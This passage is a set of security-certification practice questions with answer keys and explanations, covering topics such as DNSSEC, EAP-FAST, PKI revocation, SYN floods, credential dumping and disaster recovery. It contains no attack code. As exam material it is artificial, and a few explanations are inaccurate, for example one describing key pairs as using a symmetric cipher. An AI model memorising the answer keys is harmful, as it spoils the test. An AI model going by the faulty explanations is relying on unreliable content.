A, B, and D With DNS Security Extensions (DNSSEC) enabled, the authoritative server for the zone creates a "package" of resource records (RRset). An RRset is signed with a private key (the Zone Signing Key). When another server requests a secure record exchange, the authoritative server returns the package and its public key. With DNSSEC, the public Zone Signing Key is signed with a separate Key Signing Key. Separate keys are used so that if there is a compromise, the domain can continue to operate securely by revoking the compromised key and issuing a new one. An Access Control List can prevent zone transfers to unauthorized hosts, preventing an external server from obtaining information about the private network. This is not part of DNSSEC.
A hacker remotely gains unauthorized access to a company's system and makes a copy of proprietary business data. Which of the following summarizes the event that has taken place? A. Data exfiltration B. Data loss C. Identity theft D. Financial loss
A. Data exfiltration refers to the methods and tools by which an attacker transfers data without authorization from the victim's systems to an external network or media. Data loss describes any event where data has become unavailable, either permanently or temporarily. This can when data goes corrupt and cannot be restored via a backup. Identity theft may involve, for example, the hacker's ability to obtain account credentials to access a system or personal details and financial information to make fraudulent credit card purchases." Financial losses are due to damages, fines, and loss of business. Although the copying or proprietary data can lead to greater competition and loss of business, this does not describe this specific attack.
A security engineer implements a secure wireless network. In doing so, the engineer decides to use EAP with Flexible Authentication via Secure Tunneling (EAP-FAST). Which authentication approach does the engineer implement? A. Protected Access Credential (PAC) instead of a certificate B. Any inner authentication protocol such as PAP or CHAP C. Only requiring a server-side public key certificate D. The supplicant and server are configured with certificates.
A. EAP with Flexible Authentication via Secure Tunneling (EAP-FAST) is similar to PEAP, but instead of using a certificate to set up the tunnel, it uses a Protected Access Credential (PAC). EAP-Tunneled TLS (EAP-TTLS) is similar to PEAP. It uses a server-side certificate and can use any inner authentication protocol (PAP or CHAP, for instance). In Protected Extensible Authentication Protocol (PEAP), an encrypted tunnel is established between the supplicant and authentication server and only requires a server-side public key certificate. EAP-TLS is one of the strongest types of authentication and the supplicant and server are configured with certificates.
Examine the features of different virtual platform implementations and select the statement that best describes the difference between a Type I and a Type II hypervisor. A. A Type II hypervisor installs on a host OS, that manages virtual machines. A Type I (or "bare metal") hypervisor interfaces directly with the host hardware. B. A Type I hypervisor installs directly on a host OS to manage virtual machines, while a Type II hypervisor interfaces directly with the host hardware. C. A Type I hypervisor must be compatible with the host OS, while a Type II hypervisor needs only support the base system requirements for the hypervisor, plus resources for the installed guest OSes. D. A host-based hypervisor interfaces directly with the host hardware, whereas a Type I hypervisor installs as software that runs virtual machines.
A. In a guest OS (or host-based) system, the hypervisor application (known as a Type II hypervisor) is itself installed onto a host operating system. The hypervisor software must support the host OS. A bare metal virtual platform means that the hypervisor (Type I hypervisor) installs directly onto the computer and manages access to the host hardware without going through a host OS. For a Type I hypervisor, the hardware needs only support the base system requirements for the hypervisor, plus resources for the type and number of guest operating systems that will be installed. One basic distinction between virtual platforms is between host and bare metal methods of interacting with the host hardware.
Which of the following statements best contrasts between a service-oriented architecture (SOA) model and a microservices-based model? A. SOA can build services from other services, while an implementation of microservices develops, tests, and deploys microservices independently. B. Microservices are loosely decoupled, while SOA services are considered highly decoupled. C. SOA focuses on making a single, discrete task easily repeatable, while microservices perform a sequence of automated tasks. D. Microservices help to make a network's design architecture fit a business's requirements, rather than accommodating the business workflow to the platform requirements, as in SOA.
A. SOA allows a service to build from other services. By contrast, each microservice should be capable of being developed, tested, and deployed independently. The microservices can be described as highly decoupled rather than just loosely decoupled. Services and clients requesting services do not have as many compatibility restraints with SOA as with monolithic applications; the independence between the client and service is referred to as loose coupling. Where automation focuses on making a single, discrete task easily repeatable, orchestration performs a sequence of automated tasks. Virtualization helps to make the design architecture fit to the business requirement rather than accommodate the business workflow to the platform requirement.
A retail establishment experiences an attack where whole number values have been exploited. As a result, some credit values are manipulated from positive values to negative values. Which type of attack is the establishment dealing with? A. Integer overflow B. Buffer overflow C. Stack overflow D. Race condition
A. An integer overflow attack causes the target software to calculate a value that exceeds these bounds. This may cause a positive number to become negative. A buffer is an area of memory that the application reserves to store expected data. To exploit a buffer overflow vulnerability, the attacker passes data that deliberately overfills the buffer. A stack is an area of memory used by a program. It includes a return address, which is the location of the program that called the subroutine. An attacker could use a buffer overflow to change the return address. Race conditions occur when the outcome from an execution process is directly dependent on the order and timing of certain events, and those events fail.
Identify the type of attack where malware forces a legitimate process to load a malicious link library. A. DLL injection B. Pass the hash (PtH) C. Null pointer dereferencing D. Overflow attack
A. DLL injection is a vulnerability in the way the operating system allows one process to attach to another. Malware can abuse this functionality to force a legitimate process to load a malicious link library. In a pass the hash (PtH) attack, the attacker harvests an account's cached credentials when the user logs into a single sign-on (SSO) system. Attempting to read or write that memory address via the pointer is called dereferencing. If the memory location is invalid or null, this creates a null pointer dereference type of exception and the process may crash. In an overflow attack, the threat actor submits input that is too large to store in an application variable.
A user at a realtor's office contacts their IT department to report that they are not able to copy contract files to a USB flash drive to take home. Which explanation does the IT representative share with the user? A. Data loss prevention prevents file copying. B. Mobile device management restricts the use of a portable USB device. C. A compromised private key has created a trust issue. D. The file copy process has been allow-listed.
A. Data loss prevention (DLP) performs a copy protection function based on policies. It does not govern file access, but it mediates the copying of certain tagged data to restrict it to authorized media and services. Mobile Device Management (MDM) provides execution control over apps and features of smartphones. Features include GPS, camera, and microphone. If a host is compromised, the private key it used for digital signatures, or digital envelopes for messaging and communications, is no longer safe. This is outside the function of a file copy. An execution control policy defines applications that can or cannot be run. An allow list denies execution unless the process is explicitly authorized.
A security analytics team is threat hunting on a Windows network. What type of activity is most likely to alert the team to an insider attack? A. A user without privileged access executes PowerShell Invoke-Command cmdlet. B. A privileged user account executes PowerShell Invoke-Command cmdlet. C. A user without privileged access uses a Bash command whoami to locate users on the local network. D. A privileged user account uses Constrained Language Mode (CLM) and signed scripts.
A. Lateral movement or an insider attack uses access to execute a process remotely, using a tool such as psexec or PowerShell. These commands can blend in with ordinary network operations, though they could be anomalous behavior for a non-privileged account. Cmdlets, such as Invoke-Expression, can indicate an attempt to run some type of binary shellcode. Privileged users' use of PowerShell is far less suspicious than a non-privileged user executing the same commands. A malicious script running on a Linux host might attempt to use commands, such as whoami and ifconfig/ip/route to establish the local context. The use of CLM and signed scripts indicate legitimate behavior and can limit the ability to exploit code to run on high-value target systems.
Which of the following authentication procedures effectively employs multifactor authentication? A. A password reset prompt requires the user to supply the answer to several recovery questions. B. A system login requires a user to insert a smart card and enter a PIN. C. An entry control point employs a security guard and requires entrants to submit to a retinal scan. D. A system login requires a user to enter a password, pin, and passphrase.
B A login prompt that requires both a physical object the user holds and a PIN the user knows, employs multifactor authentication. The password reset prompt uses only single-factor authentication. If the password reset process also sent a one-time code to an authorized device, then it would be multifactor authentication, requiring both something the user knows and has. A security guard is a physical access control, but not an authentication mechanism. The retinal scan is a single-factor authentication mechanism. Passwords, PINs, and passphrases all fall under the category of "something you know" authentication. Multifactor authentication requires the use of at least two factors.
A company without an internal IT team hires a service provider to monitor a computer network for security issues. Before the service provider is given access, which agreement is put in place to establish expectations? A. NDA B. SLA C. ISA D. PII
B A service level agreement (SLA) is a contractual agreement setting out the detailed terms or expectations under which a service is provided. A nondisclosure agreement (NDA) provides a legal basis for protecting information assets. NDAs are used between companies and employees, between companies and contractors, and between two companies. Interconnection security agreements (ISA) are used for integrating systems. Any federal agency interconnecting its IT system to a third party must create an ISA to govern the relationship. Personally identifiable information (PII) is data that can be used to identify, contact, or locate an individual. A Social Security Number (SSN) is an example of PII.
Which security related phrase relates to the integrity of data? A. Availability B. Modification C. Confidentiality D. Risk
B Any modification is authorized and is stored and transferred as intended when referring to the integrity of data. Integrity is part of the CIA triad. Availability means that any information is accessible to those authorized to view or modify it. Availability is part of the CIA triad. Confidentiality means that certain information should only be known to certain people. Confidentiality is part of the CIA triad. Risk is the likelihood and impact (or consequence) of a threat actor exploiting a vulnerability.
An employee suspected of storing illicit content on a company computer discovers a plan to investigate, so the employee tries to hide evidence of wrongdoing. The employee deletes the illicit files and attempts to overwrite them. If a forensics investigation can discover the lost files, which statement best describes how? A. The forensics investigation will not be able to locate the lost files. B. The forensics investigator can retrieve fragments of deleted or overwritten files. C. The forensics investigator must use a live acquisition tool to retrieve files in recent memory. D. The forensics investigation can uncover the lost data using a cache acquisition tool.
B Data recovery refers to analyzing a disk (or image of a disk) for file fragments stored in slack space, which might represent deleted or overwritten files. Carving is the process of recovering them. Carving is the process of extracting data from a computer when that data has no associated file system metadata. Live acquisition copies data while the host is still running. Disk image acquisition obtains data from non-volatile storage. Data recovery can use a disk image. Cache can refer either to hardware components or software. Software-based cache is stored in the file system and can be acquired as part of a disk image. Contents of a hardware cache (CPU registers and disk controller read/write cache, for instance) are not generally recoverable.
A large data facility just experienced a disaster-level event, and the IT team is in the process of reconstituting systems. Which statement illustrates the appropriate first step the team should take in this process? A. First, the team should enable and test switch infrastructure, then routing appliances and systems. B. First, the team should enable and test power delivery systems, including grid power, power distribution units (PDUs), uninterruptible power supplies (UPS), and secondary generators. C. First, the team should enable and test network security appliances, including firewalls, intrusion detection systems (IDS), and proxies. D. First, the team should enable and test critical network servers, including dynamic host configuration protocol (DHCP), domain name system (DNS), network time protocol (NTP), and directory services.
B If systems come back online in an uncontrolled way, there is the serious risk of causing additional power problems or of causing problems in the network, OS, or application layers because dependencies between different appliances and servers have not been met. The first step in the process is enabling and testing power delivery systems (grid power, power distribution units (PDUs), UPS, secondary generators, and so on). Secondly, the team should enable and test switch infrastructure, then routing appliances and systems. The third step is to enable and test network security appliances (firewalls, IDS, proxies). The fourth step is enabling and testing critical network servers (DHCP, DNS, NTP, and directory services).
An intrusion prevention system (IPS) generates an incident report for some suspicious user activity, which prompts a system administrator to investigate a possible insider attack. Analyze the scenario and determine what type of IPS profile led to this discovery. A. Signature-based detection B. Behavioral-based detection C. Host-based intrusion detection D. Web application firewall (WAF) detection
B In behavioral-based detection, the engine recognizes deviations from a baseline of "normal" traffic or events, which can help identify zero-day attacks, insider threats, and other malicious activity. Signature-based detection (or pattern-matching) means that the engine is loaded with a database of attack patterns or signatures. If traffic matches a pattern, then the engine generates an incident. A host-based IDS (HIDS) captures information from a single host, such as a server, router, or firewall. HIDS software produces a log that shows which process initiated the event and what resources on the host were affected. A web application firewall (WAF) is designed specifically to protect software running on web servers and their backend databases from code injection and DoS attacks.
A company located in the western United States that uses cloud computing relies on redundant systems in adjacent availability zones for data backup and storage. Analyze the configuration and determine which level of high availability service the company utilizes. A. Local replication B. Regional replication C. Geo-redundant storage (GRS) D. Cloud service replication
B Regional replication (also called zone-redundant storage) replicates data across multiple data centers within one or two regions. This safeguards data and access in the event a single data center is destroyed or goes offline. Local replication replicates data within a single data center in the region where the company created its storage account. Replicas are often in separate fault domains and upgrade domains. Geo-redundant storage (GRS) replicates data to a secondary region that is distant from the primary region. This safeguards data in the event of a regional outage or a disaster. Data replication allows businesses to copy data to where the business can utilize it most effectively. Data replication requires low latency network connections, security, and data integrity.
A company performing a risk assessment calculates how much return the company has saved by implementing a security measure. Which formula will they use to calculate this metric? A. Asset value x EF B. [(ALE-ALEm)-Cost of Solution]/Cost of Solution C. SLE x ARO D. (ALE-SLE)/Cost of Solution
B Return on Security Investment (ROSI) calculates a new ALE, based on reduction in loss by new security controls. ROSI is: [(ALE - ALEm) - Cost of Solution] / Cost of Solution, where ALE is before controls and ALEm is after controls. Single Loss Expectancy (SLE) is the potential loss from a single event. Multiplying the value of the asset by an Exposure Factor (EF), where EF is the percentage of an asset lost, gives the SLE. Annualized Loss Expectancy (ALE) is the potential for loss over the course of a year. Multiplying the SLE by the Annualized Rate of Occurrence (ARO) gives the ALE. Annualized Loss Expectancy (ALE) is a yearly figure, while Single Loss Expectancy (SLE) measures a single event.
A user attempts to use a smart card for Kerberos authentication. If the user is successfully authenticated, how does the authentication server respond? A. A user certificate is issued B. A session key is issued C. A public key is issued D. A CA certificate is issued
B When authentication is complete, the authentication server responds with a Ticket Granting Ticket (TGT) and Ticket Granting Service (TGS) session key. The authentication server is able to decrypt a TGT request because it has a matching public key and trusts the user's certificate. The certificate is not issued. A smart card's cryptoprocessor uses its private key to create a Ticket Granting Ticket (TGT) request, which is transmitted to the authentication server (AS). The private key is used with a matching public key. A user's certificate is issued by a local certification authority or by a third-party CA that is a trusted root CA. This is a certificate the user has and is not issued during the authentication process.
What phases of the Incident Response Process involves determining if an attack happened and mitigating its effects? (Select all that apply.) A. Eradication B. Identification C. Containment D. Preparation
B and C Identification is the step where information from an alert or report is used to determine whether an incident has taken place, assess how severe it might be (triage), and notify stakeholders. Containment is the step to limit the scope and magnitude of the incident. The principal aim of incident response is to secure data while limiting the immediate impact. Eradication is the step to remove the cause and restore the affected system to a secure state by wiping a system and applying secure configuration settings. Preparation is the precursor step to make the system resilient to attack in the first place. This includes hardening systems, writing policies and procedures, and setting up confidential lines of communication.
An engineering firm provisions microwave technology for a wide area communications project. When using point-to-multipoint (P2M) mode, which technologies does the firm put in place? (Select all that apply.) A. Directional antennas B. Sectoral antennas C. Multiple sites connected to a single hub D. High gain link between two sites
B and C Point-to-multipoint (P2M) microwave links multiple sites and uses smaller sectoral antennas than P2P, each covering a separate quadrant. P2M links multiple sites or subscriber nodes to a single hub. This can be more cost-efficient in high density urban areas and requires less radio spectrum. A high gain connection means that the antennas used between sites are highly directional. Each antenna is pointed directly at the other. Point-to-point (P2P) microwave uses high gain antennas to link two sites. The satellite modems or routers are also normally paired to one another.
An engineer routinely provides data to a source that compiles threat intelligence information. The engineer focuses on behavioral threat research. Which information does the engineer provide? A. IP addresses associated with malicious behavior B. Descriptions of example attacks C. Correlation of events observed with known actor indicators D. Data available as a paid subscription
B. Behavioral threat research is narrative commentary describing examples of attacks and TTPs gathered through primary research sources. Reputational threat intelligence includes lists of IP addresses and domains associated with malicious behavior, plus signatures of known file-based malware. Threat data is computer data that can correlate events observed on a customer's own networks and logs with known TTP and threat actor indicators. Data that is part of a closed/proprietary system is made available as a paid subscription to a commercial threat intelligence platform. There is no mention of a subscription model in this case.
Systems administrators configure an application suite that uses a collection of single hash functions and symmetric ciphers to protect sensitive communication. While the suite uses these security features collectively, how is each instance recognized? A. As non-repudiation B. As a cryptographic system C. As a cryptographic primitive D. As a key pair
C A single hash function, symmetric cipher, or asymmetric cipher is called a cryptographic primitive. The properties of different symmetric/asymmetric/hash types and of specific ciphers for each type impose limitations when used alone. Non-repudiation depends on a recipient not being able to encrypt the message, or the recipient would be able to impersonate the sender. A complete cryptographic system or product is likely to use multiple cryptographic primitives, such as within a cipher suite. To use a key pair, the user or server generates the linked keys. These keys are an example of a cryptographic primitive that uses a symmetric cipher.
A company's IT department pushes system updates and configures user permissions from the same shared account. Which statement best describes how this practice is problematic? A. This practice relies on a single point of failure. B. This practice breaks data integrity. C. This practice breaks non-repudiation. D. This practice fails to properly separate duties among users.
C Admin should replace the default superuser with named accounts that have sufficient elevated privileges for a given job role. This ensures that admin can audit administrative activity and the system conforms to non-repudiation. Password changes to a shared account represent a risk. Passwords need to changing often, and distributing new passwords to shared account users poses a challenge to password security. A shared account breaks the principle of non-repudiation and makes an accurate audit trail difficult to establish. Separation of duties is a means of establishing checks and balances against the possibility that critical systems or procedures can be compromised by insider threats. The company should divide duties and responsibilities among individuals to prevent ethical conflicts or abuse of powers.
A new systems administrator at an organization has a difficult time understanding some of the configurations from the previous IT staff. It appears many shortcuts were taken to keep systems running and users happy. Which weakness does the administrator report this configuration as? A. Complex dependencies B. Overdependence on perimeter security C. Availability over confidentiality and integrity D. Single points of failure
C Availability over confidentiality and integrity is often presented by taking "shortcuts" to get a service up and running. Compromising security might represent a quick fix but creates long term risks. Complex dependencies may include services that require many different systems to be available. Ideally, the failure of individual systems or services should not affect the overall performance of other network services. Overdependence on perimeter security can occur if the network architecture is "flat." Penetrating the network edge gives the attacker freedom of movement. A single point of failure is a "pinch point" in a network that may rely on a single hardware server or appliance.
Compare the advantages and disadvantages of certificate revocation versus suspension and select the scenario that presents the best argument for certificate revocation. A. An online business changed its domain name. B. An administrative user left his/her company. C. A banking website's private key may have been compromised. D. A key used for encryption is accidentally destroyed.
C If a private key is compromised, the admin can revoke the key pair to prevent users from trusting the public key. CAs maintain a certificate revocation list (CRL) of all revoked and suspended certificates. A CA or certificate owner may revoke or suspend a certificate for a variety of reasons. If the reason is for a domain name change and not because of compromise or misuse, suspension may be preferable. If a departing administrative user has not compromised data, certificate revocation may be unnecessary, and other security measures may be more appropriate to secure assets. If the key used to decrypt data is lost or damaged, the admin cannot recover the encrypted data, unless they made a backup of the key.
A new security technician is tasked with sanitizing data on solid state drives (SSD). The technician first uses a degaussing magnet and then smashes the drives with a hammer. What is the likely result of this sanitization attempt? A. The drives are now sufficiently sanitized. B. The degaussing magnet failed to destroy media on the SSD, but smashing the drives with a hammer makes data permanently irrecoverable. C. Degaussing fails to destroy media on the SSD, and smashing by hammer may leave a significant amount of data recoverable. D. The degaussing magnet successfully destroyed media on the SSD, but smashing by hammer is an ineffective physical sanitization measure.
C Media sanitization and remnant removal erase data from hard drives, flash drives/SSDs, tape media, CD and DVD ROMs before disposing of them or putting them to a different use. Degaussing does not work with SSDs and a hammer is an ineffective physical sanitation measure. SSDs, flash media, and optical media cannot be degaussed, as degaussing only works for hard disk drives. To pulverize media, organizations should use industrial machinery, rather than hammers, to ensure destruction. Degaussing involves exposing a hard disk to a powerful electromagnet, which disrupts the magnetic pattern that stores the data on the disk surface. SSDs store data on NAND chips, which are not affected by degaussing. Industrial machinery should be used to ensure pulverization as a physical sanitation measure. Degaussing will not destroy media on a SSD. SSDs do not store data magnetically and degaussing specifically targets data on magnetic media. Hitting a hard drive with a hammer can leave a surprising amount of recoverable data, so destruction by pulverization should utilize industrial machinery.
Company policy prohibits employees from taking any type of portable computing or storage device other than managed laptops identified by RFID tags into an equipment room. Video surveillance has been implemented within the equipment room. As part of a compliance audit, you must classify the surveillance control. Which single classification is BEST suited to classifying the surveillance system? A. Operational B. Corrective C. Physical D. Managerial
C Physical is a way of classifying controls by characteristic and refers to things that operate in the built environment, such as locks, badge readers, security guards, video surveillance, and lighting. Operational is a way of classifying controls by characteristic and refers to things that bind the way people should behave, such as procedural and policy-based controls. Corrective is a way of classifying controls by function and refers to the set of controls that operate to mitigate an event that has already happened, such as using backup software to recover from destruction of data files. Managerial is a way of classifying controls by characteristic and refers to controls that give insight and reporting into the whole security system, such as risk assessment and compliance monitoring.
A security information and event management (SIEM) handler's dashboard provides graphical representations of user profile trends. The graphic contrasts standard user activity with administrative user activity and flags activity that deviates from these clusters. This graphical representation utilizes which trend analysis methodology? A. Frequency-based trend analysis B. Volume based trend analysis C. Statistical deviation analysis D. Syslog trend analysis
C Statistical deviation analysis can alert security admin to a suspicious data point. A cluster graph might show activity by standard users and privileged users, and data points outside these clusters may indicate suspicious account activity. Frequency-based trend analysis establishes a baseline for a metric, and if frequency exceeds the baseline threshold, then the system raises an alert. Volume-based trend analysis uses simpler indicators, such as log or network traffic volume, or endpoint disk usage. Unusual log growth needs investigating, and unexpected disk capacity may signify data exfiltration. Syslog provides an open format, protocol, and server software for logging event messages. A very wide range of host types use Syslog.
An investigator needs to analyze all data on a system. Which file does the investigator review if it contains data while in use when physical RAM in a system is exceeded? A. Hibernation file B. Dump file C. Swap file D. Temp file
C The pagefile/swap file/swap partition stores pages of memory in use that exceed the capacity of the host's RAM modules. The pagefile is not structured in a way that analysis tools can interpret, but it is possible to search for strings . A hibernation file is created on disk in the root folder of the boot volume when a Windows host is put into a sleep state. When Windows encounters an unrecoverable kernel error, it can write contents of memory to a dump file. A temp, or temporary, file is a file that is created during certain circumstances such as when software is installed or when a file is currently open by an application.
Analyze the following statements and select the one that describes key differences between internet protocol security (IPSec) modes. A. Transport mode allows communication between virtual private networks (VPNs), while tunnel mode secures communications between hosts on a private network. B. Authentication Header (AH) mode provides confidentiality, as the payload is encrypted. Encapsulation Security Payload (ESP) mode does not provide confidentiality and/or authentication and integrity. C. Tunnel mode allows communication between virtual private networks (VPNs), while transport mode secures communications between hosts on a private network. D. Encapsulation Security Payload (ESP) mode does not provide confidentiality, as the payload is not encrypted. Authentication Header (AH) mode provides confidentiality and/or authentication and integrity.
C Tunnel mode, also called router implementation, creates a virtual private network (VPN), allowing communications between VPN gateways across an unsecure network. Transport mode secures communications between hosts on a private network (an end-to-end implementation). The AH protocol authenticates the origin of transmitted data and provides integrity and protection against replay attacks. The payload is not encrypted, so this protocol does not provide confidentiality. ESP is an IPSec sub-protocol that enables encryption and authentication of a data packet's header and payload. Encapsulation Security Payload (ESP) provides confidentiality and/or authentication and integrity, and can be used to encrypt the packet.
An organization installs embedded systems throughout a manufacturing plant. When planning the install, engineers had to consider system constraints related to identification. As a result, which areas of the systems are impacted? (Select all that apply.) A. PC B. Network C. Compute resources D. Authentication
C and D The lack of compute resources means that embedded systems are not well-matched to the cryptographic identification technologies that are widely used on computer networks. As embedded systems become more accessible, they will need to use authentication technologies to ensure consistent confidentiality, integrity, and availability. A PC is a dynamic environment. The user can add or remove programs and data files, install new hardware components, and upgrade the operating system. A static environment does not allow or require such frequent changes. Networks for embedded systems emphasize the power-efficient transfer of small amounts of data with a high degree of reliability and low latency.
Compare the types of Distributed Denial of Service (DDoS) attacks and select the best example of a synchronize (SYN) flood attack. A. A group of attackers work together to form an attack on a network. B. An attack consumes all of the network bandwidth resulting in denial to legitimate hosts. C. Client IP addresses are spoofed to misdirect the server's SYN/ACK packet increasing session queues. D. A client's IP address is spoofed and pings the broadcast address of a third-party network with many hosts.
C. An SYN flood attack works by withholding clients' ACK packets during TCP's three-way handshakes that can increase the server session queues and prevent other legitimate clients from connecting. The server will continue to send SYN/ACK packets because there is no acknowledgment and will not timeout until sometime later. A coordinated attack occurs when a group of attackers engage together against a well-known company or government institution. DDoS attacks can be simple and just focus on consuming network bandwidth resulting in the denial of legitimate hosts. A smurf attack occurs by the adversary spoofing the client's IP address and then pings the broadcast address of a third-party network with many hosts. This is known as amplifying the network.
A junior engineer suspects there is a breached system based on an alert received from a software monitor. The use of the alert provides which information to the engineer? A. TTP B. CTI C. IoC D. ISAC
C. An indicator of compromise (IoC) is a residual sign that an asset or network has been successfully attacked or is continuing to be attacked and provides evidence of a TTP. A tactic, technique, or procedure (TTP) is a generalized statement of adversary behavior. TTPs categorize behaviors in terms of a campaign strategy. Threat data can be packaged as feeds that integrate with a security information and event management (SIEM) platform. These feeds are usually described as cyber threat intelligence (CTI) data. Public/private information sharing centers are utilized in many critical industries. Information Sharing and Analysis Centers (ISAC) are set up to share threat intelligence and promote best practices.
The IT staff at a large company review numerous security logs and discover that the SAM database on Windows workstations is being accessed by a malicious process. What does the staff determine the issue to be? A. Shellcode B. Persistence C. Credential dumping D. Lateral movement
C. Credential dumping is a method used to access the credentials file (SAM on a local Windows workstation) or sniff credentials held in memory by the lsass.exe system process. Shellcode is a minimal program designed to exploit a buffer overflow or similar vulnerability to gain privileges to a system. Persistence is a mechanism that maintains a connection if the threat actor's backdoor is restarted, if the host reboots, or if the user logs off. With lateral movement, the attacker might be seeking data assets or may try to widen access by changing the system security configuration.
An organization hires a pen tester. The tester achieves a connection to a perimeter server. Which technique allows the tester to bypass a network boundary from this advantage? A. Persistence B. Privilege escalation C. Pivoting D. Lateral movement
C. If the pen tester achieves a foothold on a perimeter server, a pivot allows them to bypass a network boundary and compromise servers on an inside network. Persistence is the tester's ability to reconnect to the compromised host and use it as a remote access tool (RAT) or backdoor. A pen tester enumerates running services and accounts associated in an attempt to escalate privileges and gain further access. Lateral movement is the action of gaining control over other hosts. This is done partly to discover more opportunities to widen access, partly to identify where valuable data assets might be located, and partly to evade detection.
Consider an abstract model of network functions for an infrastructure as code (IaC) implementation and determine which plane describes how traffic is prioritized. A. Data B. Management C. Control D. Application
C. The control plane makes decisions about how traffic should be prioritized, secured, and switched. A software-defined networking (SDN) application can be used to define policy decisions. The data plane handles the actual switching and routing of traffic and imposition of security access controls. Decisions made in the control plane are implemented on the data plane. The management plane is used to monitor traffic conditions and network status. SDN can be used to manage compatible physical appliances, but also virtual switches, routers, and firewalls. Applications interface with network devices by using APIs. The interface between the SDN applications and the SDN controller is described as the "northbound" API, while that between the controller and appliances is the "southbound" API.
A customer responds to an email advertisement that appears to link to mystore.com. The customer logs into the website with their username and password. The website has the same homepage the customer is familiar with, but it is actually a page set up by an attacker to gain credentials. The attacker can then login to mystore.com with the user's credentials, and shop using the saved credit card on file. Which type of attack has occurred in this scenario? A. Denial of Service (DoS) B. DNS client cache poisoning C. Pharming D. Pollution
C. A pharming attack occurs when the attacker compromises the process of Domain Name System (DNS) resolution to replace the valid IP address for a trusted website. The attacker can then receive all of the packets directed to the site designed to fool the user into thinking it is genuine. A Denial of Service (DoS) attack can occur by directing all traffic for a particular fully qualified domain name to an invalid IP address (black hole). DNS client cache poisoning occurs when an attacker modifies the HOSTS file to redirect traffic. Pollution is another name for DNS server cache poisoning. It is a redirection attack that aims to corrupt the records held by the DNS server.
A systems administrator uses a disk image to provision new workstations. After installing several workstations, it is found that they no longer boot. It is possible that the disk image in use included malicious code. Which specific method has stopped the systems from starting? A. UEFI B. Measured boot C. Secure boot D. Boot attestation
C. Secure boot is designed to prevent a computer from being hijacked by a malicious OS. UEFI is configured with digital certificates from valid OS vendors to verify legitimacy. Unified extensible firmware interface (UEFI) provides code that allows the host to boot to an OS. UEFI can enforce a number of boot integrity checks. A measured boot process uses the trusted platform module (TPM) at each stage in the boot process to check whether hashes of key system state data have changed. This does not usually prevent booting. Boot attestation is the capability to transmit a boot log report signed by the TPM via a trusted process to a remote server.
An end-user has enabled cookies for several e-commerce websites and has started receiving targeted ads. The ads do not trouble the user until, when trying to access an e-commerce site, the user gets several pop-up ads that automatically redirect the user to suspicious sites the user did not intend to visit. What is the most likely explanation for this phenomenon? A. Tracking cookies have infected the user's computer. B. Ransomware has infected the user's computer. C. Spyware has infected the user's computer. D. Crypto-malware has infected the user's computer.
C. Spyware can perform adware-like tracking and monitor local activity. Another spyware technique is to perform domain name service (DNS) redirection to pharming sites. Cookies are not malware, but if browser settings allow third-party cookies, they can record pages visited, search queries, browser metadata, and IP addresses. Ransomware is a type of Trojan malware that tries to extort money from the victim. It will display threatening messages, stating the computer will remain locked until the victim pays the ransom. Crypto-malware is a class of ransomware that attempts to encrypt data files. The user will be unable to access the files without obtaining the private encryption key, which is held by the attacker.
Consider the Public Key Infrastructure (PKI) Trust Model. Which of the following best protects against compromise? A. Single CA B. Intermediate CA C. Self-signed CA D. Offline CA
D An offline Certificate Authority (CA) is where the root CA has been disconnected from the network to protect it from compromise. Therefore, it is not a single point of failure. A single CA issues certificates to users, but is very exposed. If it is compromised, the whole PKI collapses. In a hierarchical model, the root CA issues certificates to several intermediate CAs, diluting risk. However, the root is still a single point of failure. A self-signed certificate is a type of digital certificate that is owned by the entity that signs it, which makes it a single CA, or root.
A security investigator compiles a report for an organization that lost data in a breach. Which ethical approach does the investigator apply while collecting data for the report? A. Search for relevant information B. Apply standard tags to files C. Disclosing of evidence D. Using repeatable methods
D Analysis methods should follow strong ethical principles and must be repeatable by third parties with access to the same evidence. This can indicate that any evidence has not been changed or manipulated. Searching information through e-discovery allows investigators to locate files of interest to the case. As well as keyword search, software might support semantic search. Applying standardized keywords or tags to files and metadata helps to organize evidence. Tags might be used to indicate relevancy to a case or part of a case. Disclosure is an important part of trial procedure. Disclosure states that the same evidence be made available to both plaintiff and defendant.
Which statement best illustrates the advantages and disadvantages of using asymmetric encryption? A. Asymmetric encryption is ideal for bulk encryption, but it is not suitable for proving a user's identity. B. Asymmetric encryption provides non-repudiation, but it is not ideal for secure distribution and storage of a private key. C. Asymmetric encryption is ideal for encrypting communications where the total length of the message is not known, but it requires significant overhead computing. D. Asymmetric encryption is ideal for proving identity, but it requires significant computing overhead and is inefficient for bulk encryption.
D Another user cannot impersonate a private key holder, so asymmetric encryption proves identity. The public and private keys are linked in such a way as to make it impossible to derive one from the other. The drawback of asymmetric encryption is that it involves substantial computing overhead compared to symmetric encryption. Symmetric encryption is very fast. It is used for bulk encryption of large amounts of data. The main problem is secure key distribution and storage. In a stream cipher, each byte or bit of data in the plaintext is encrypted one at a time. This is suitable for encrypting communications where the total length of the message is not known.
The Human Resources department issues a policy at an organization to govern the use of company owned computer equipment. Which behavior type does this policy address? A. Code of conduct B. Clean desk C. Bring your own device D. Acceptable use
D Enforcing an acceptable use policy (AUP) is important to protect the organization from the security and legal implications of employees misusing its equipment. A code of conduct, or rules of behavior, sets out expected professional standards. For example, employees' use of social media may be harmful to the company. A clean desk policy means that each employee's work area should be free from any documents left there. This helps to hide confidential information. Portable devices, such as smartphones, USB sticks, media players, and so on, pose a considerable threat to data security. Rules should be outlined in a bring your own device (BYOD) policy.
After a break-in at a government laboratory, some proprietary information was stolen and leaked. Which statement best summarizes how the laboratory can implement security controls to prevent future breaches? The laboratory needs to take detective action and should implement physical and deterrent controls in the future. The laboratory needs to take detective action and should implement corrective controls in the future. The laboratory needs to take compensatory action and should implement physical controls in the future. The laboratory needs to take corrective action and should implement both physical and preventative controls in the future.
D Following a break-in that included both physical intrusion and data compromise, the lab should take corrective action to reduce the impact of the intrusion event. Implementing preventative measures can help secure data from future attacks, and physical controls can mitigate the probability of future physical break-ins. Deterrent controls, such as warning signs, may not physically or logically prevent access, but psychologically discourage attackers from attempting an intrusion. Detective controls, such as logs, which operate during an attack, may not prevent or deter access, but they will identify and record any attempted or successful intrusion. Compensating controls serve as a substitute for a principal control, but corrective controls reduce the impact of an intrusion event.
A web server receives data from an application. It appears that passing this data causes an issue that evolves into an overflow at the destination. What process on the receiving server should be investigated? A. Normalization B. Output encoding C. Error handling D. Input validation
